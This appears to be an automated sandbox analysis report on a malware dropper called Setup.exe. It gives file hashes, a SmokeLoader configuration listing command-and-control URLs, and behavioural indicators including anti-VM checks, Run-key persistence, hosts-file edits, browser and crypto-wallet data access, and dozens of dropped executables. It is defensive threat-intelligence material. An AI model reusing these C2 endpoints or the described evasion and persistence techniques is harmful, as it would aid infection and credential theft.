Analysis
-
max time kernel
250s -
max time network
1806s -
platform
windows11_x64 -
resource
win11 -
submitted
19-10-2021 08:05
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
Setup.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
Setup.exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Setup.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win10-de-20211014
General
-
Target
Setup.exe
-
Size
425KB
-
MD5
93d44fa2ceefa5dab55b3b4d89c5c3de
-
SHA1
5af7a4e78c39b15e8d94a6c8ea247c96734ecca5
-
SHA256
8bd004298abd06e9e01067f14ca55f5d5cc899c37fc03c7b0cc3eb6702c84437
-
SHA512
b481bbf8551a9d56e8161b15661ab6c08f5d024f8ccb0e842d1d2db82f80a401dd8ed3892fa8a917dcddb198c91bd5eca678093ff1b263a2194d4cc47ec65977
Malware Config
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
http://gfdjgdfjgdhfbg.space/
http://gfhjdsghdfjg23.space/
http://gdfjgdfh4543nf.space/
http://fgdjgsdfghj4fds.space/
http://fgdgdjfgfdgdf.space/
http://fsdhjfsdhfsd.space/
http://fgdsjghdfghjdfhgd.space/
http://ryuesrseyth3.space/
http://fdsjkuhreyu4.space/
http://fdgjdfgehr4.space/
http://fgdgjhdfgdfjgd.space/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5740 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7928 4908 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3420 created 1244 3420 WerFault.exe RD7xOcy3VQHmAwSgZbhezd8B.exe PID 3504 created 1744 3504 WerFault.exe 3Epq67p4ckusTei5nXzNLNK0.exe PID 876 created 3036 876 WerFault.exe QYUmrdKRz8BDDtM93WnnT1fs.exe PID 5620 created 1284 5620 WerFault.exe koWWz0CDL9D_1Drwoq08LvCC.exe PID 4024 created 1552 4024 WerFault.exe 2cueFNHmLXQajzNJ90hDfGNw.exe PID 5296 created 5648 5296 WerFault.exe rundll32.exe PID 1244 created 5712 1244 WerFault.exe MgfK7sdY6ayqDIIEjBhcUIUp.exe PID 4116 created 5328 4116 WerFault.exe _52YqC1xoN2nJyiPlEUAxEMy.exe PID 7144 created 3036 7144 WerFault.exe 66CA.exe PID 7372 created 4668 7372 WerFault.exe C161.exe PID 7564 created 6844 7564 WerFault.exe D5C4.exe PID 7608 created 7492 7608 WerFault.exe explorer.exe PID 8056 created 7968 8056 WerFault.exe rundll32.exe PID 8196 created 6860 8196 WerFault.exe GcleanerEU.exe PID 8460 created 7172 8460 WerFault.exe gcleaner.exe PID 9696 created 8720 9696 WerFault.exe 692D.exe PID 12488 created 9720 12488 WerFault.exe 9D0F.exe -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/1552-432-0x0000000004CD0000-0x0000000004DA6000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
MsiExec.exeflow pid process 630 8916 MsiExec.exe 664 8916 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
ShareFolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe -
Executes dropped EXE 64 IoCs
Processes:
eEGpwAFaiH5Tn6mwEgGJ9xt_.exePSrNEL7YgEJZ0xyCqQYVkq2R.exeRD7xOcy3VQHmAwSgZbhezd8B.exeCPrpRnM8IeYXmA2gAu6BvtNE.exeRvxGhnQ_OEMC18xXwR0VxQcn.exe4aT3PF6SgnV8ZkLFpRL7NRID.exe2cueFNHmLXQajzNJ90hDfGNw.exeQYUmrdKRz8BDDtM93WnnT1fs.exe3Epq67p4ckusTei5nXzNLNK0.exeyuXeMxxM0BfMLtDDhBTtQsDP.exeCtryp2hRVmlso4rkGtOzVamP.exeH9aHWEApAVLTEbLrPMUXwkhu.exeUqjuQ1dgHGsSiPLUpbp52GVy.exehrhEFdag2pQKmAwA8AOXAH5Z.exekoWWz0CDL9D_1Drwoq08LvCC.exevB85CLYRioIwOWyvE81XtmUq.exeU6DuogN1ECFWruE4A0SlHzun.exeextd.executm3.exeDownFlSetup999.exeiZ4M1J96Sntem8227kHDdgjJ.exeextd.exe4042726.exeuL5L3V3osNAsffBCSX6lDR_a.exe8pWB.eXE7151052.exeextd.exe5749535.exeZGNpAqpmaPDLoM65XACxqexp.exe11.exeTransmissibility.exeextd.exe250740.exe5515576.exe_52YqC1xoN2nJyiPlEUAxEMy.exe2074177.exevCb_ITY6AL7dTgGs36nKl_Yo.exem8vJyQQTxNnnbI7OvxWcWqMc.exe33BHucR49cevMh8DhI5Gch69.exeGDP5Gq5p3Y41kH0ygZ5p6eSl.exeMgfK7sdY6ayqDIIEjBhcUIUp.exesetup.exeoyUPf1tOtiNIPxx3GV9BGX_U.exeMbAulC41IUPtgTysOqxTGnoL.exeGDP5Gq5p3Y41kH0ygZ5p6eSl.tmpsvchost.exeShareFolder.exehrhEFdag2pQKmAwA8AOXAH5Z.exeWinHoster.exe5166190.exesetup.exe3931810.exe1001385.exe4040985.exe4795979.exe38C4.exefoldershare.exeLahypaekuwe.exeLucajulywe.exe66CA.exe7C18.exe99B3.exe38C4.exepid process 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1080 PSrNEL7YgEJZ0xyCqQYVkq2R.exe 1244 RD7xOcy3VQHmAwSgZbhezd8B.exe 1508 CPrpRnM8IeYXmA2gAu6BvtNE.exe 1572 RvxGhnQ_OEMC18xXwR0VxQcn.exe 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe 1552 2cueFNHmLXQajzNJ90hDfGNw.exe 3036 QYUmrdKRz8BDDtM93WnnT1fs.exe 1744 3Epq67p4ckusTei5nXzNLNK0.exe 3132 yuXeMxxM0BfMLtDDhBTtQsDP.exe 488 Ctryp2hRVmlso4rkGtOzVamP.exe 2032 H9aHWEApAVLTEbLrPMUXwkhu.exe 4752 UqjuQ1dgHGsSiPLUpbp52GVy.exe 3488 hrhEFdag2pQKmAwA8AOXAH5Z.exe 1284 koWWz0CDL9D_1Drwoq08LvCC.exe 1920 vB85CLYRioIwOWyvE81XtmUq.exe 4980 U6DuogN1ECFWruE4A0SlHzun.exe 3256 extd.exe 1180 cutm3.exe 4540 DownFlSetup999.exe 3736 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 1936 extd.exe 1788 4042726.exe 4308 uL5L3V3osNAsffBCSX6lDR_a.exe 3152 8pWB.eXE 2108 7151052.exe 3516 extd.exe 3848 5749535.exe 3708 ZGNpAqpmaPDLoM65XACxqexp.exe 4292 11.exe 4992 Transmissibility.exe 4848 extd.exe 4672 250740.exe 5144 5515576.exe 5328 _52YqC1xoN2nJyiPlEUAxEMy.exe 5352 2074177.exe 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe 5476 m8vJyQQTxNnnbI7OvxWcWqMc.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5700 GDP5Gq5p3Y41kH0ygZ5p6eSl.exe 5712 MgfK7sdY6ayqDIIEjBhcUIUp.exe 5768 setup.exe 5800 oyUPf1tOtiNIPxx3GV9BGX_U.exe 6080 MbAulC41IUPtgTysOqxTGnoL.exe 6028 GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp 5132 svchost.exe 5708 ShareFolder.exe 5204 hrhEFdag2pQKmAwA8AOXAH5Z.exe 5008 WinHoster.exe 5764 5166190.exe 5848 setup.exe 3564 3931810.exe 3500 1001385.exe 2104 4040985.exe 5976 4795979.exe 72 38C4.exe 6020 foldershare.exe 764 Lahypaekuwe.exe 3028 Lucajulywe.exe 3036 66CA.exe 5332 7C18.exe 3988 99B3.exe 5396 38C4.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe upx -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1001385.exe7151052.exe250740.exesvchost.exe3931810.exe7C18.exe99B3.exeUqjuQ1dgHGsSiPLUpbp52GVy.exe5749535.exeH9aHWEApAVLTEbLrPMUXwkhu.exeCPrpRnM8IeYXmA2gAu6BvtNE.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1001385.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7151052.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 250740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3931810.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7C18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7151052.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3931810.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 99B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7C18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UqjuQ1dgHGsSiPLUpbp52GVy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5749535.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1001385.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H9aHWEApAVLTEbLrPMUXwkhu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 250740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5749535.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CPrpRnM8IeYXmA2gAu6BvtNE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CPrpRnM8IeYXmA2gAu6BvtNE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UqjuQ1dgHGsSiPLUpbp52GVy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H9aHWEApAVLTEbLrPMUXwkhu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 99B3.exe -
Loads dropped DLL 64 IoCs
Processes:
iZ4M1J96Sntem8227kHDdgjJ.exe33BHucR49cevMh8DhI5Gch69.exeGDP5Gq5p3Y41kH0ygZ5p6eSl.tmpsetup.exesetup.exerundll32.exemsiexec.exeinstaller.exeautosubplayer.exeMsiExec.exerundll32.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeMsiExec.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exepid process 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 6028 GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5768 setup.exe 5768 setup.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 5848 setup.exe 5848 setup.exe 5648 rundll32.exe 2260 msiexec.exe 2260 msiexec.exe 6892 installer.exe 6892 installer.exe 7076 autosubplayer.exe 6892 installer.exe 7628 MsiExec.exe 7628 MsiExec.exe 7076 autosubplayer.exe 7968 rundll32.exe 5768 setup.exe 5768 setup.exe 8532 Calculator.exe 5768 setup.exe 5848 setup.exe 5848 setup.exe 8632 Calculator.exe 5848 setup.exe 8632 Calculator.exe 8532 Calculator.exe 8532 Calculator.exe 8632 Calculator.exe 5768 setup.exe 5848 setup.exe 4796 iZ4M1J96Sntem8227kHDdgjJ.exe 5672 33BHucR49cevMh8DhI5Gch69.exe 8936 Calculator.exe 9008 Calculator.exe 8916 MsiExec.exe 9032 Calculator.exe 9436 Calculator.exe 9452 Calculator.exe 9436 Calculator.exe 9436 Calculator.exe 9452 Calculator.exe 9444 Calculator.exe 9444 Calculator.exe 9460 Calculator.exe 9452 Calculator.exe 9460 Calculator.exe 9460 Calculator.exe 9444 Calculator.exe 9608 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe themida C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe themida C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe themida C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe themida C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe themida C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe themida behavioral4/memory/4752-244-0x00000000006C0000-0x00000000006C1000-memory.dmp themida behavioral4/memory/2032-261-0x0000000000A70000-0x0000000000A71000-memory.dmp themida C:\Users\Admin\AppData\Roaming\7151052.exe themida C:\Users\Admin\AppData\Roaming\5749535.exe themida C:\Users\Admin\AppData\Roaming\7151052.exe themida behavioral4/memory/2108-341-0x0000000000370000-0x0000000000371000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
ShareFolder.exesetup.exesetup.exemsedge.exe5515576.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Nytudofavae.exe\"" ShareFolder.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5" setup.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5515576.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
CPrpRnM8IeYXmA2gAu6BvtNE.exeUqjuQ1dgHGsSiPLUpbp52GVy.exe7151052.exesvchost.exe3931810.exe1001385.exe99B3.exeH9aHWEApAVLTEbLrPMUXwkhu.exe250740.exe5749535.exe7C18.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CPrpRnM8IeYXmA2gAu6BvtNE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UqjuQ1dgHGsSiPLUpbp52GVy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7151052.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3931810.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1001385.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 99B3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA H9aHWEApAVLTEbLrPMUXwkhu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 250740.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5749535.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7C18.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\E: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ipinfo.io 21 ipinfo.io 54 ip-api.com 55 ipinfo.io 94 ipinfo.io 116 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
UqjuQ1dgHGsSiPLUpbp52GVy.exeH9aHWEApAVLTEbLrPMUXwkhu.exe7151052.exe250740.exe3931810.exe5749535.exe1001385.exe99B3.exe7C18.exepid process 4752 UqjuQ1dgHGsSiPLUpbp52GVy.exe 2032 H9aHWEApAVLTEbLrPMUXwkhu.exe 2108 7151052.exe 4672 250740.exe 3564 3931810.exe 3848 5749535.exe 3500 1001385.exe 3988 99B3.exe 5332 7C18.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
hrhEFdag2pQKmAwA8AOXAH5Z.exe38C4.exe9D0F.exedescription pid process target process PID 3488 set thread context of 5204 3488 hrhEFdag2pQKmAwA8AOXAH5Z.exe hrhEFdag2pQKmAwA8AOXAH5Z.exe PID 72 set thread context of 5396 72 38C4.exe 38C4.exe PID 9720 set thread context of 12416 9720 9D0F.exe AppLaunch.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeShareFolder.exe4aT3PF6SgnV8ZkLFpRL7NRID.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe File created C:\Program Files\Common Files\YAKWFFCKGL\foldershare.exe ShareFolder.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe 4aT3PF6SgnV8ZkLFpRL7NRID.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll 